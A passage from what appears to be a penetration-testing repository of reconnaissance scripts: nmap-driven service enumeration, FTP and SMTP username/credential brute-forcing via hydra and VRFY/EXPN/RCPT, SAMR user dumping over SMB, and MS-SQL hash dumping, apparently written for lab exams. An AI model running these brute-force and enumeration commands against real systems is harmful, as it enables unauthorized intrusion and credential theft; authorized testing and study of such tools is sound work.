205 | local $SIG{ALRM} = sub { die "alarm\n" };
206 | alarm $query_timeout;
207 | my $connect_host;
208 | if (defined($relayserver)) {
209 | $connect_host = $relayserver;
210 | } else {
211 | $connect_host = $host;
212 | }
213 | my $s = IO::Socket::INET->new( PeerAddr => $connect_host,
214 | PeerPort => $finger_port,
215 | Proto => 'tcp'
216 | )
217 | or die "Can't connect to $host:$finger_port: $!\n";
218 | if (defined($relayserver)) {
219 | $s->send($username . "@" . "$host\r\n");
220 | } else {
221 | $s->send("$username\r\n");
222 | }
223 | $s->recv($response, 10000);
224 | alarm 0;
225 | };
226 |
227 | if ($@) {
228 | $timed_out = 1;
229 | print "[Child $$] Timeout for username $username on host $host\n" if $debug;
230 | }
231 |
232 | my $trace;
233 | if ($debug) {
234 | $trace = "[Child $$] $username\@$host: ";
235 | } else {
236 | $trace = "$username\@$host: ";
237 | }
238 |
239 | if ($response and not $timed_out) {
240 |
241 | # Negative result against solaris 7
242 | #
243 | # blah@10.0.0.1 Login Name TTY Idle When Where
244 | # blah ???
245 | if ($response =~ /Login\s+Name\s+TTY\s+Idle\s+When\s+Where.*$username\s+\?\?\?[^<>]+$/s) {
246 | print $parent $trace . "\n";
247 | next;
248 | }
249 |
250 | # Negative result for unknow finger daemon
251 | # It just returns a single "f" - presumably for "false"
252 | if ($response =~ /\s*f\s*$/) {
253 | print $parent $trace . "\n";
254 | next;
255 | }
256 |
257 | #
258 | # Positive result against solaris 7
259 | #
260 | # if ($response =~ /^Login\s+Name\s+TTY\s+Idle\s+When\s+Where.*($username\s+[^?].*)/s) {
261 | # if ($response =~ /Login\s+Name\s+TTY\s+Idle\s+When\s+Where.*($username.*<.*>.*)/s) {
262 | if ($response =~ /Login\s+Name\s+TTY\s+Idle\s+When\s+Where.*($username.*)/s) {
263 | my $username_info = $1;
264 | $username_info =~ s/[\r\n]/./g; # Reduce to a single line
265 | print $parent $trace . "$username_info\n";
266 | next;
267 | }
268 |
269 | # Assume a positive response if we don't recognise the format
270 | $response =~ s/[\n\r]/./g;
271 | print $parent $trace . "$response\n";
272 | next;
273 | }
274 |
275 | if ($timed_out) {
276 | print $parent $trace . "\n";
277 | } else {
278 | if (!$response) {
279 | print $parent $trace . "\n";
280 | }
281 | }
282 | }
283 | exit;
284 | }
285 | }
286 |
287 | # Fork once more to make a process that will us usernames and hosts
288 | socketpair(my $get_next_query, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!";
289 | $get_next_query->autoflush(1);
290 | $parent->autoflush(1);
291 |
292 | # Parent executes this
293 | if (my $pid = fork) {
294 | close $parent;
295 |
296 | # Chile executes this
297 | } else {
298 | # Generate queries from username-host pairs and send to parent
299 | foreach my $username (@usernames) {
300 | foreach my $host (@hosts) {
301 | my $query = $host . "\t" . $username;
302 | print "[Query Generator] Sending $query to parent\n" if $debug;
303 | print $parent "$query\n";
304 | }
305 | }
306 |
307 | exit 0;
308 | }
309 |
310 | printf "Created %d child processes\n", scalar(@child_handles) if $debug;
311 | my $s = IO::Select->new();
312 | my $s_in = IO::Select->new();
313 | $s->add(@child_handles);
314 | $s_in->add(\*STDIN);
315 | my $timeout = 0; # non-blocking
316 | my $more_queries = 1;
317 | my $outstanding_queries = 0;
318 | my $query_count = 0;
319 | my $result_count = 0;
320 |
321 | # Write to each child process once
322 | writeloop: foreach my $write_handle (@child_handles) {
323 | my $query = <$get_next_query>;
324 | if ($query) {
325 | chomp($query);
326 | print "[Parent] Sending $query to child\n" if $debug;
327 | print $write_handle "$query\n";
328 | $outstanding_queries++;
329 | } else {
330 | print "[Parent] Quitting main loop. All queries have been read.\n" if $debug;
331 | last writeloop;
332 | }
333 | }
334 |
335 | # Keep reading from child processes until there are no more queries left
336 | # Write to a child only after it has been read from
337 | mainloop: while (1) {
338 | # Wait until there's a child that we can either read from or written to.
339 | my ($rh_aref) = IO::Select->select($s, undef, undef); # blocking
340 |
341 | print "[Parent] There are " . scalar(@$rh_aref) . " children that can be read from\n" if $debug;
342 |
343 | foreach my $read_handle (@$rh_aref) {
344 | # Read from child
345 | chomp(my $line = <$read_handle>);
346 | if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) {
347 | print "$line\n";
348 | $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //);
349 | }
350 | $outstanding_queries--;
351 | $query_count++;
352 |
353 | # Write to child
354 | my $query = <$get_next_query>;
355 | if ($query) {
356 | chomp($query);
357 | print "[Parent] Sending $query to child\n" if $debug;
358 | print $read_handle "$query\n";
359 | $outstanding_queries++;
360 | } else {
361 | print "DEBUG: Quitting main loop. All queries have been read.\n" if $debug;
362 | last mainloop;
363 | }
364 | }
365 | }
366 |
367 | # Wait to get replies back from remaining children
368 | my $count = 0;
369 | readloop: while ($outstanding_queries) {
370 | my @ready_to_read = $s->can_read(1); # blocking
371 | foreach my $child_handle (@ready_to_read) {
372 | print "[Parent] Outstanding queries: $outstanding_queries\n" if $debug;
373 | chomp(my $line = <$child_handle>);
374 | if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) {
375 | print "$line\n";
376 | $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //);
377 | }
378 | print $child_handle "$kill_child_string\n";
379 | $s->remove($child_handle);
380 | $outstanding_queries--;
381 | $query_count++;
382 | }
383 | }
384 |
385 | # Tell any remaining children to exit
386 | foreach my $handle ($s->handles) {
387 | print "[Parent] Telling child to exit\n" if $debug;
388 | print $handle "$kill_child_string\n";
389 | }
390 |
391 | # Wait for all children to terminate
392 | while(wait != -1) {};
393 |
394 | print "######## Scan completed at " . scalar(localtime()) . " #########\n";
395 | print "$result_count results.\n";
396 | print "\n";
397 | $end_time = time(); # Second granularity only to avoid depending on hires time module
398 | my $run_time = $end_time - $start_time;
399 | $run_time = 1 if $run_time < 1; # Avoid divide by zero
400 | printf "%d queries in %d seconds (%0.1f queries / sec)\n", $query_count, $run_time, $query_count / $run_time;
401 |
--------------------------------------------------------------------------------
/recon_scan/ftprecon.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import subprocess
3 | import sys
4 | import os
5 |
6 | if len(sys.argv) != 3:
7 | print "Usage: ftprecon.py "
8 | sys.exit(0)
9 |
10 | ip_address = sys.argv[1].strip()
11 | port = sys.argv[2].strip()
12 | print "INFO: Performing nmap FTP script scan for " + ip_address + ":" + port
13 | FTPSCAN = "nmap -sV -Pn -vv -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '/root/scripts/recon_enum/results/exam/%s_ftp.nmap' %s" % (port, ip_address, ip_address)
14 | results = subprocess.check_output(FTPSCAN, shell=True)
15 | outfile = "results/exam/" + ip_address + "_ftprecon.txt"
16 | f = open(outfile, "w")
17 | f.write(results)
18 | f.close
19 |
20 | print "INFO: Performing hydra ftp scan against " + ip_address
21 | HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_ftphydra.txt -u %s -s %s ftp" % (ip_address, ip_address, port)
22 | results = subprocess.check_output(HYDRA, shell=True)
23 | resultarr = results.split("\n")
24 | for result in resultarr:
25 | if "login:" in result:
26 | print "[*] Valid ftp credentials found: " + result
27 |
--------------------------------------------------------------------------------
/recon_scan/readme.txt:
--------------------------------------------------------------------------------
1 | This readme file pertains to the reconscan.py script and all associated scripts.
2 |
3 | Currently these scripts include:
4 | reconscan.py (main)
5 | dirbust.py
6 | dnsrecon.py
7 | ftprecon.py
8 | reconscan.py
9 | smbrecon.py
10 | smtprecon.py
11 | snmprecon.py
12 | sshrecon.py
13 |
14 | This collection of scripts is intended to be executed remotely against a list of IPs to enumerate discovered
15 | services such as smb, smtp, snmp, ftp and other.
16 |
17 | Author:
18 | Mike Czumak (T_v3rn1x) -- @SecuritySift
19 |
20 | How to use:
21 | reconscan.py is the main script which calls all other scripts. Simply run it and it should do the work for you.
22 | Since I wrote this for a very specific use case I hard-coded all paths so be sure you change them accordingly.
23 | You'll also need to check the directories used for writing and modify accordingly as well. I intentionally kept
24 | these scripts modular so that each script could also be run on its own.
25 |
26 | Warning:
27 | These scripts comes as-is with no promise of functionality or accuracy. I strictly wrote them for personal use
28 | I have no plans to maintain updates, I did not write them to be efficient and in some cases you may find the
29 | functions may not produce the desired results so use at your own risk/discretion. I wrote these scripts to
30 | target machines in a lab environment so please only use them against systems for which you have permission!!
31 |
32 | Modification, Distribution, and Attribution:
33 | You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
34 | author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
35 | worth anything anyway :)
36 |
37 |
--------------------------------------------------------------------------------
/recon_scan/reconscan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | ###############################################################################################################
4 | ## [Title]: reconscan.py -- a recon/enumeration script
5 | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
6 | ##-------------------------------------------------------------------------------------------------------------
7 | ## [Details]:
8 | ## This script is intended to be executed remotely against a list of IPs to enumerate discovered services such
9 | ## as smb, smtp, snmp, ftp and other.
10 | ##-------------------------------------------------------------------------------------------------------------
11 | ## [Warning]:
12 | ## This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use
13 | ## I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
14 | ## functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
15 | ## target machines in a lab environment so please only use it against systems for which you have permission!!
16 | ##-------------------------------------------------------------------------------------------------------------
17 | ## [Modification, Distribution, and Attribution]:
18 | ## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
19 | ## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
20 | ## worth anything anyway :)
21 | ###############################################################################################################
22 |
23 | import subprocess
24 | import multiprocessing
25 | from multiprocessing import Process, Queue
26 | import os
27 | import time
28 |
29 | def multProc(targetin, scanip, port):
30 | jobs = []
31 | p = multiprocessing.Process(target=targetin, args=(scanip,port))
32 | jobs.append(p)
33 | p.start()
34 | return
35 |
36 |
37 | def dnsEnum(ip_address, port):
38 | print "INFO: Detected DNS on " + ip_address + ":" + port
39 | if port.strip() == "53":
40 | SCRIPT = "./dnsrecon.py %s" % (ip_address)# execute the python script
41 | subprocess.call(SCRIPT, shell=True)
42 | return
43 |
44 | def httpEnum(ip_address, port):
45 | print "INFO: Detected http on " + ip_address + ":" + port
46 | print "INFO: Performing nmap web script scan for " + ip_address + ":" + port
47 | HTTPSCAN = "nmap -sV -Pn -vv -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-email-harvest,http-methods,http-method-tamper,http-passwd,http-robots.txt -oN /root/scripts/recon_enum/results/exam/%s_http.nmap %s" % (port, ip_address, ip_address)
48 | results = subprocess.check_output(HTTPSCAN, shell=True)
49 | DIRBUST = "./dirbust.py http://%s:%s %s" % (ip_address, port, ip_address) # execute the python script
50 | subprocess.call(DIRBUST, shell=True)
51 | #NIKTOSCAN = "nikto -host %s -p %s > %s._nikto" % (ip_address, port, ip_address)
52 | return
53 |
54 | def httpsEnum(ip_address, port):
55 | print "INFO: Detected https on " + ip_address + ":" + port
56 | print "INFO: Performing nmap web script scan for " + ip_address + ":" + port
57 | HTTPSCANS = "nmap -sV -Pn -vv -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-email-harvest,http-methods,http-method-tamper,http-passwd,http-robots.txt -oX /root/scripts/recon_enum/results/exam/%s_https.nmap %s" % (port, ip_address, ip_address)
58 | results = subprocess.check_output(HTTPSCANS, shell=True)
59 | DIRBUST = "./dirbust.py https://%s:%s %s" % (ip_address, port, ip_address) # execute the python script
60 | subprocess.call(DIRBUST, shell=True)
61 | #NIKTOSCAN = "nikto -host %s -p %s > %s._nikto" % (ip_address, port, ip_address)
62 | return
63 |
64 | def mssqlEnum(ip_address, port):
65 | print "INFO: Detected MS-SQL on " + ip_address + ":" + port
66 | print "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port
67 | MSSQLSCAN = "nmap -vv -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=1433,smsql.username-sa,mssql.password-sa -oX results/exam/nmap/%s_mssql.xml %s" % (port, ip_address, ip_address)
68 | results = subprocess.check_output(MSSQLSCAN, shell=True)
69 |
70 | def sshEnum(ip_address, port):
71 | print "INFO: Detected SSH on " + ip_address + ":" + port
72 | SCRIPT = "./sshrecon.py %s %s" % (ip_address, port)
73 | subprocess.call(SCRIPT, shell=True)
74 | return
75 |
76 | def snmpEnum(ip_address, port):
77 | print "INFO: Detected snmp on " + ip_address + ":" + port
78 | SCRIPT = "./snmprecon.py %s" % (ip_address)
79 | subprocess.call(SCRIPT, shell=True)
80 | return
81 |
82 | def smtpEnum(ip_address, port):
83 | print "INFO: Detected smtp on " + ip_address + ":" + port
84 | if port.strip() == "25":
85 | SCRIPT = "./smtprecon.py %s" % (ip_address)
86 | subprocess.call(SCRIPT, shell=True)
87 | else:
88 | print "WARNING: SMTP detected on non-standard port, smtprecon skipped (must run manually)"
89 | return
90 |
91 | def smbEnum(ip_address, port):
92 | print "INFO: Detected SMB on " + ip_address + ":" + port
93 | if port.strip() == "445":
94 | SCRIPT = "./smbrecon.py %s 2>/dev/null" % (ip_address)
95 | subprocess.call(SCRIPT, shell=True)
96 | return
97 |
98 | def ftpEnum(ip_address, port):
99 | print "INFO: Detected ftp on " + ip_address + ":" + port
100 | SCRIPT = "./ftprecon.py %s %s" % (ip_address, port)
101 | subprocess.call(SCRIPT, shell=True)
102 | return
103 |
104 | def nmapScan(ip_address):
105 | ip_address = ip_address.strip()
106 | print "INFO: Running general TCP/UDP nmap scans for " + ip_address
107 | serv_dict = {}
108 | TCPSCAN = "nmap -vv -Pn -A -sC -sS -T 4 -p- -oN '/root/scripts/recon_enum/results/exam/%s.nmap' -oX '/root/scripts/recon_enum/results/exam/nmap/%s_nmap_scan_import.xml' %s" % (ip_address, ip_address, ip_address)
109 | UDPSCAN = "nmap -vv -Pn -A -sC -sU -T 4 --top-ports 200 -oN '/root/scripts/recon_enum/results/exam/%sU.nmap' -oX '/root/scripts/recon_enum/results/exam/nmap/%sU_nmap_scan_import.xml' %s" % (ip_address, ip_address, ip_address)
110 | results = subprocess.check_output(TCPSCAN, shell=True)
111 | udpresults = subprocess.check_output(UDPSCAN, shell=True)
112 | lines = results.split("\n")
113 | for line in lines:
114 | ports = []
115 | line = line.strip()
116 | if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
117 | while " " in line:
118 | line = line.replace(" ", " ");
119 | linesplit= line.split(" ")
120 | service = linesplit[2] # grab the service name
121 | port = line.split(" ")[0] # grab the port/proto
122 | if service in serv_dict:
123 | ports = serv_dict[service] # if the service is already in the dict, grab the port list
124 |
125 | ports.append(port)
126 | serv_dict[service] = ports # add service to the dictionary along with the associated port(2)
127 |
128 | # go through the service dictionary to call additional targeted enumeration functions
129 | for serv in serv_dict:
130 | ports = serv_dict[serv]
131 | if (serv == "http"):
132 | for port in ports:
133 | port = port.split("/")[0]
134 | multProc(httpEnum, ip_address, port)
135 | elif (serv == "ssl/http") or ("https" in serv):
136 | for port in ports:
137 | port = port.split("/")[0]
138 | multProc(httpsEnum, ip_address, port)
139 | elif "ssh" in serv:
140 | for port in ports:
141 | port = port.split("/")[0]
142 | multProc(sshEnum, ip_address, port)
143 | elif "smtp" in serv:
144 | for port in ports:
145 | port = port.split("/")[0]
146 | multProc(smtpEnum, ip_address, port)
147 | elif "snmp" in serv:
148 | for port in ports:
149 | port = port.split("/")[0]
150 | multProc(snmpEnum, ip_address, port)
151 | elif ("domain" in serv):
152 | for port in ports:
153 | port = port.split("/")[0]
154 | multProc(dnsEnum, ip_address, port)
155 | elif ("ftp" in serv):
156 | for port in ports:
157 | port = port.split("/")[0]
158 | multProc(ftpEnum, ip_address, port)
159 | elif "microsoft-ds" in serv:
160 | for port in ports:
161 | port = port.split("/")[0]
162 | multProc(smbEnum, ip_address, port)
163 | elif "ms-sql" in serv:
164 | for port in ports:
165 | port = port.split("/")[0]
166 | multProc(httpEnum, ip_address, port)
167 |
168 | print "INFO: TCP/UDP Nmap scans completed for " + ip_address
169 | return
170 |
171 | # grab the discover scan results and start scanning up hosts
172 | print "############################################################"
173 | print "#### RECON SCAN ####"
174 | print "#### A multi-process service scanner ####"
175 | print "#### http, ftp, dns, ssh, snmp, smtp, ms-sql ####"
176 | print "############################################################"
177 |
178 | if __name__=='__main__':
179 | f = open('results/exam/targets.txt', 'r') # CHANGE THIS!! grab the alive hosts from the discovery scan for enum
180 | for scanip in f:
181 | jobs = []
182 | p = multiprocessing.Process(target=nmapScan, args=(scanip,))
183 | jobs.append(p)
184 | p.start()
185 | f.close()
186 |
--------------------------------------------------------------------------------
/recon_scan/samrdump.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python2.7
2 | # Copyright (c) 2003-2012 CORE Security Technologies
3 | #
4 | # This software is provided under under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 | # $Id: samrdump.py 592 2012-07-11 16:45:20Z bethus@gmail.com $
9 | #
10 | # Description: DCE/RPC SAMR dumper.
11 | #
12 | # Author:
13 | # Javier Kohen
14 | # Alberto Solino
15 | #
16 | # Reference for:
17 | # DCE/RPC for SAMR
18 |
19 | import socket
20 | import string
21 | import sys
22 | import types
23 |
24 | from impacket import uuid, version
25 | from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
26 | import argparse
27 |
28 |
29 | class ListUsersException(Exception):
30 | pass
31 |
32 | class SAMRDump:
33 | KNOWN_PROTOCOLS = {
34 | '139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139),
35 | '445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445),
36 | }
37 |
38 |
39 | def __init__(self, protocols = None,
40 | username = '', password = '', domain = '', hashes = None):
41 | if not protocols:
42 | protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
43 |
44 | self.__username = username
45 | self.__password = password
46 | self.__domain = domain
47 | self.__protocols = [protocols]
48 | self.__lmhash = ''
49 | self.__nthash = ''
50 | if hashes is not None:
51 | self.__lmhash, self.__nthash = hashes.split(':')
52 |
53 |
54 | def dump(self, addr):
55 | """Dumps the list of users and shares registered present at
56 | addr. Addr is a valid host name or IP address.
57 | """
58 |
59 | encoding = sys.getdefaultencoding()
60 |
61 | print 'Retrieving endpoint list from %s' % addr
62 |
63 | # Try all requested protocols until one works.
64 | entries = []
65 | for protocol in self.__protocols:
66 | protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
67 | port = protodef[1]
68 |
69 | print "Trying protocol %s..." % protocol
70 | rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
71 |
72 | try:
73 | entries = self.__fetchList(rpctransport)
74 | except Exception, e:
75 | print 'Protocol failed: %s' % e
76 | raise
77 | else:
78 | # Got a response. No need for further iterations.
79 | break
80 |
81 |
82 | # Display results.
83 |
84 | for entry in entries:
85 | (username, uid, user) = entry
86 | base = "%s (%d)" % (username, uid)
87 | print base + '/Enabled:', ('false', 'true')[user.is_enabled()]
88 | print base + '/Last Logon:', user.get_logon_time()
89 | print base + '/Last Logoff:', user.get_logoff_time()
90 | print base + '/Kickoff:', user.get_kickoff_time()
91 | print base + '/Last PWD Set:', user.get_pwd_last_set()
92 | print base + '/PWD Can Change:', user.get_pwd_can_change()
93 | print base + '/PWD Must Change:', user.get_pwd_must_change()
94 | print base + '/Group id: %d' % user.get_group_id()
95 | print base + '/Bad pwd count: %d' % user.get_bad_pwd_count()
96 | print base + '/Logon count: %d' % user.get_logon_count()
97 | items = user.get_items()
98 | for i in samr.MSRPCUserInfo.ITEMS.keys():
99 | name = items[samr.MSRPCUserInfo.ITEMS[i]].get_name()
100 | name = name.encode(encoding, 'replace')
101 | print base + '/' + i + ':', name
102 |
103 | if entries:
104 | num = len(entries)
105 | if 1 == num:
106 | print 'Received one entry.'
107 | else:
108 | print 'Received %d entries.' % num
109 | else:
110 | print 'No entries received.'
111 |
112 |
113 | def __fetchList(self, rpctransport):
114 | dce = dcerpc.DCERPC_v5(rpctransport)
115 |
116 | encoding = sys.getdefaultencoding()
117 | entries = []
118 |
119 | dce.connect()
120 | dce.bind(samr.MSRPC_UUID_SAMR)
121 | rpcsamr = samr.DCERPCSamr(dce)
122 |
123 | try:
124 | resp = rpcsamr.connect()
125 | if resp.get_return_code() != 0:
126 | raise ListUsersException, 'Connect error'
127 |
128 | _context_handle = resp.get_context_handle()
129 | resp = rpcsamr.enumdomains(_context_handle)
130 | if resp.get_return_code() != 0:
131 | raise ListUsersException, 'EnumDomain error'
132 |
133 | domains = resp.get_domains().elements()
134 |
135 | print 'Found domain(s):'
136 | for i in range(0, resp.get_entries_num()):
137 | print " . %s" % domains[i].get_name()
138 |
139 | print "Looking up users in domain %s" % domains[0].get_name()
140 | resp = rpcsamr.lookupdomain(_context_handle, domains[0])
141 | if resp.get_return_code() != 0:
142 | raise ListUsersException, 'LookupDomain error'
143 |
144 | resp = rpcsamr.opendomain(_context_handle, resp.get_domain_sid())
145 | if resp.get_return_code() != 0:
146 | raise ListUsersException, 'OpenDomain error'
147 |
148 | domain_context_handle = resp.get_context_handle()
149 | resp = rpcsamr.enumusers(domain_context_handle)
150 | if resp.get_return_code() != 0 and resp.get_return_code() != 0x105:
151 | raise ListUsersException, 'OpenDomainUsers error'
152 |
153 | done = False
154 | while done is False:
155 | for user in resp.get_users().elements():
156 | uname = user.get_name().encode(encoding, 'replace')
157 | uid = user.get_id()
158 |
159 | r = rpcsamr.openuser(domain_context_handle, uid)
160 | print "Found user: %s, uid = %d" % (uname, uid)
161 |
162 | if r.get_return_code() == 0:
163 | info = rpcsamr.queryuserinfo(r.get_context_handle()).get_user_info()
164 | entry = (uname, uid, info)
165 | entries.append(entry)
166 | c = rpcsamr.closerequest(r.get_context_handle())
167 |
168 | # Do we have more users?
169 | if resp.get_return_code() == 0x105:
170 | resp = rpcsamr.enumusers(domain_context_handle, resp.get_resume_handle())
171 | else:
172 | done = True
173 | except ListUsersException, e:
174 | print "Error listing users: %s" % e
175 |
176 | dce.disconnect()
177 |
178 | return entries
179 |
180 |
181 | # Process command-line arguments.
182 | if __name__ == '__main__':
183 | print version.BANNER
184 |
185 | parser = argparse.ArgumentParser()
186 |
187 | parser.add_argument('target', action='store', help='[domain/][username[:password]@]')
188 | parser.add_argument('protocol', choices=SAMRDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)')
189 |
190 | group = parser.add_argument_group('authentication')
191 |
192 | group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
193 | if len(sys.argv)==1:
194 | parser.print_help()
195 | sys.exit(1)
196 |
197 | options = parser.parse_args()
198 |
199 | import re
200 |
201 | domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
202 |
203 | if domain is None:
204 | domain = ''
205 |
206 | dumper = SAMRDump(options.protocol, username, password, domain, options.hashes)
207 | dumper.dump(address)
208 |
--------------------------------------------------------------------------------
/recon_scan/smbrecon.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import sys
3 | import subprocess
4 |
5 | if len(sys.argv) != 2:
6 | print "Usage: smbrecon.py "
7 | sys.exit(0)
8 |
9 | ip = sys.argv[1]
10 | NBTSCAN = "python samrdump.py %s" % (ip)
11 | nbtresults = subprocess.check_output(NBTSCAN, shell=True)
12 | if ("Connection refused" not in nbtresults) and ("Connect error" not in nbtresults) and ("Connection reset" not in nbtresults):
13 | print "[*] SAMRDUMP User accounts/domains found on " + ip
14 | lines = nbtresults.split("\n")
15 | for line in lines:
16 | if ("Found" in line) or (" . " in line):
17 | print " [+] " + line
18 |
19 |
20 |
21 |
22 |
--------------------------------------------------------------------------------
/recon_scan/smtp-user-enum.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl -w
2 | # smtp-user-enum - Brute Force Usernames via EXPN/VRFY/RCPT TO
3 | # Copyright (C) 2008 pentestmonkey@pentestmonkey.net
4 | #
5 | # This program is free software; you can redistribute it and/or modify
6 | # it under the terms of the GNU General Public License version 2 as
7 | # published by the Free Software Foundation.
8 | #
9 | # This program is distributed in the hope that it will be useful,
10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | # GNU General Public License for more details.
13 | #
14 | # You should have received a copy of the GNU General Public License along
15 | # with this program; if not, write to the Free Software Foundation, Inc.,
16 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
17 | #
18 | # This tool may be used for legal purposes only. Users take full responsibility
19 | # for any actions performed using this tool. If these terms are not acceptable to
20 | # you, then do not use this tool.
21 | #
22 | # You are encouraged to send comments, improvements or suggestions to
23 | # me at smtp-user-enum@pentestmonkey.net
24 | #
25 | # This program is derived from dns-grind v1.0 ( http://pentestmonkey.net/tools/dns-grind )
26 | #
27 |
28 | use strict;
29 | use Socket;
30 | use IO::Handle;
31 | use IO::Select;
32 | use IO::Socket::INET;
33 | use Getopt::Std;
34 | $| = 1;
35 |
36 | my $VERSION = "1.2";
37 | my $debug = 0;
38 | my @child_handles = ();
39 | my $verbose = 0;
40 | my $max_procs = 5;
41 | my $smtp_port = 25;
42 | my @usernames = ();
43 | my @hosts = ();
44 | my $recursive_flag = 1;
45 | my $query_timeout = 5;
46 | my $mode = "VRFY";
47 | my $from_address = 'user@example.com';
48 | my $start_time = time();
49 | my $end_time;
50 | my $kill_child_string = "\x00";
51 | $SIG{CHLD} = 'IGNORE'; # auto-reap
52 | my %opts;
53 | my $usage=<;
134 | }
135 |
136 | if (defined($host_file)) {
137 | open(FILE, "<$host_file") or die "ERROR: Can't open username file $host_file: $!\n";
138 | @hosts = map { chomp($_); $_ } ;
139 | }
140 |
141 | if (defined($username)) {
142 | push @usernames, $username;
143 | }
144 |
145 | if (defined($host)) {
146 | push @hosts, $host;
147 | }
148 |
149 | if (defined($host_file) and not @hosts) {
150 | print "ERROR: Targets file $host_file was empty\n";
151 | exit 1;
152 | }
153 |
154 | if (defined($username_file) and not @usernames) {
155 | print "ERROR: Username file $username_file was empty\n";
156 | exit 1;
157 | }
158 |
159 | print "Starting smtp-user-enum v$VERSION ( http://pentestmonkey.net/tools/smtp-user-enum )\n";
160 | print "\n";
161 | print " ----------------------------------------------------------\n";
162 | print "| Scan Information |\n";
163 | print " ----------------------------------------------------------\n";
164 | print "\n";
165 | print "Mode ..................... $mode\n";
166 | print "Worker Processes ......... $max_procs\n";
167 | print "Targets file ............. $host_file\n" if defined($host_file);
168 | print "Usernames file ........... $username_file\n" if defined($username_file);
169 | print "Target count ............. " . scalar(@hosts) . "\n" if @hosts;
170 | print "Username count ........... " . scalar(@usernames) . "\n" if @usernames;
171 | print "Target TCP port .......... $smtp_port\n";
172 | print "Query timeout ............ $query_timeout secs\n";
173 | print "Target domain ............ $domain\n" if defined($domain);
174 | print "\n";
175 | print "######## Scan started at " . scalar(localtime()) . " #########\n";
176 |
177 | # Spawn off correct number of children
178 | foreach my $proc_count (1..$max_procs) {
179 | socketpair(my $child, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!";
180 | $child->autoflush(1);
181 | $parent->autoflush(1);
182 |
183 | # Parent executes this
184 | if (my $pid = fork) {
185 | close $parent;
186 | print "[Parent] Spawned child with PID $pid to do resolving\n" if $debug;
187 | push @child_handles, $child;
188 |
189 | # Child executes this
190 | } else {
191 | close $child;
192 | while (1) {
193 | my $timed_out = 0;
194 |
195 | # Read host and username from parent
196 | my $line = <$parent>;
197 | chomp($line);
198 | my ($host, $username, $domain) = $line =~ /^(\S+)\t(.*)\t(.*)$/;
199 |
200 | # Append domain to username if a domain was supplied
201 | $username = $username . "@" . $domain if (defined($domain) and $domain);
202 |
203 | # Exit if told to by parent
204 | if ($line eq $kill_child_string) {
205 | print "[Child $$] Exiting\n" if $debug;
206 | exit 0;
207 | }
208 |
209 | # Sanity check host and username
210 | if (defined($host) and defined($username)) {
211 | print "[Child $$] Passed host $host and username $username\n" if $debug;
212 | } else {
213 | print "[Child $$] WARNING: Passed garbage. Ignoring: $line\n";
214 | next;
215 | }
216 |
217 | # Do smtp query with timeout
218 | my $response;
219 | eval {
220 | local $SIG{ALRM} = sub { die "alarm\n" };
221 | alarm $query_timeout;
222 | my $s = IO::Socket::INET->new( PeerAddr => $host,
223 | PeerPort => $smtp_port,
224 | Proto => 'tcp'
225 | )
226 | or die "Can't connect to $host:$smtp_port: $!\n";
227 | my $buffer;
228 | $s->recv($buffer, 10000); # recv banner
229 | if ($mode eq "VRFY") {
230 | $s->send("HELO x\r\n");
231 | $s->recv($buffer, 10000);
232 | $s->send("VRFY $username\r\n");
233 | $s->recv($buffer, 10000);
234 | } elsif ($mode eq "EXPN") {
235 | $s->send("HELO x\r\n");
236 | $s->recv($buffer, 10000);
237 | $s->send("EXPN $username\r\n");
238 | $s->recv($buffer, 10000);
239 | } elsif ($mode eq "RCPT") {
240 | $s->send("HELO x\r\n");
241 | $s->recv($buffer, 10000);
242 | $s->send("MAIL FROM:$from_address\r\n");
243 | $s->recv($buffer, 10000);
244 | $s->send("RCPT TO:$username\r\n");
245 | $s->recv($buffer, 10000);
246 | } else {
247 | print "ERROR: Unknown mode in use\n";
248 | exit 1;
249 | }
